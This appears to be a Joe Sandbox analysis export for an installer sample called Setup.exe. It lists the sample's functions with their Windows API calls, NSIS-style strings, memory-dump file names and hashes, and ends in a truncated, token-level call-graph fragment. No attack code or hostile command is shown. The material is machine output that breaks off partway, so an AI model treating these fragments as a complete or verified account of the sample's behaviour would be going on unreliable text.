• Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
APIs
• GetDlgItem.USER32(?), ref: 004020A3
• GetClientRect.USER32(00000000,?), ref: 004020B0
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
• DeleteObject.GDI32(00000000), ref: 004020EE
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
• Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
• Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
• Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
• Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
• Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
• Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
APIs
• lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
• wsprintfW.USER32 ref: 00404483
• SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
• Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
• Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
• Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• DeleteRegKey: "%s\%s", xrefs: 00402843
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
• API String ID: 1697273262-1764544995
• Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
• Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
• Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
• Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                        APIs
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
APIs
• DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
APIs
• IsWindowVisible.USER32(?), ref: 0040492E
• CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Strings
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Strings
Similarity
• API ID: PrivateProfileStringlstrcmp
• String ID: !N~
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                        Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 60

execution_graph: interactive call-graph rendering. Its serialized node/edge list (one `id address [API label]` entry per node and one `id->id` token per edge, beginning with node 96006 at 0x2b3c0a and cut off by the export) is not reproduced here.
96851->97027 97035 265d21 96851->97035 97048 2c9f27 41 API calls _wcslen 96851->97048 96855->96851 96859 26585e GetFullPathNameW 96858->96859 96859->96803 96859->96804 96861 2655ea 96860->96861 96862 26adf4 8 API calls 96861->96862 96863 263ac4 96862->96863 96863->96810 96865 261371 __fread_nolock 96864->96865 96866 261352 96864->96866 96867 28014b 8 API calls 96865->96867 96868 28017b 8 API calls 96866->96868 96869 261388 96867->96869 96868->96865 96869->96827 96870->96820 97050 26663e LoadLibraryA 96871->97050 96876 2a5648 96879 2666e7 68 API calls 96876->96879 96877 2666a4 LoadLibraryExW 97058 266607 LoadLibraryA 96877->97058 96881 2a564f 96879->96881 96883 266607 3 API calls 96881->96883 96885 2a5657 96883->96885 96884 2666ce 96884->96885 96886 2666da 96884->96886 97079 26684a 96885->97079 96887 2666e7 68 API calls 96886->96887 96890 2662fa 96887->96890 96890->96831 96890->96832 96892 2a567e 96894 263b62 96893->96894 96895 2a415f 96893->96895 96897 28017b 8 API calls 96894->96897 97376 2ca215 81 API calls __wsopen_s 96895->97376 96898 263b86 96897->96898 96899 267aab CloseHandle 96898->96899 96900 263b94 96899->96900 96901 26bf73 8 API calls 96900->96901 96904 263b9d 96901->96904 96902 263bfa 96905 26bf73 8 API calls 96902->96905 96903 263bec 96903->96902 96906 2a4179 96903->96906 97377 2cd5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96903->97377 96907 267aab CloseHandle 96904->96907 96909 263c06 96905->96909 96906->96902 96906->96903 97306 263ae9 96909->97306 96911 2a41d5 96911->96902 96997 2d36d4 96996->96997 96998 266874 64 API calls 96997->96998 96999 2d36e8 96998->96999 97412 2d3827 96999->97412 97002 26684a 40 API calls 97003 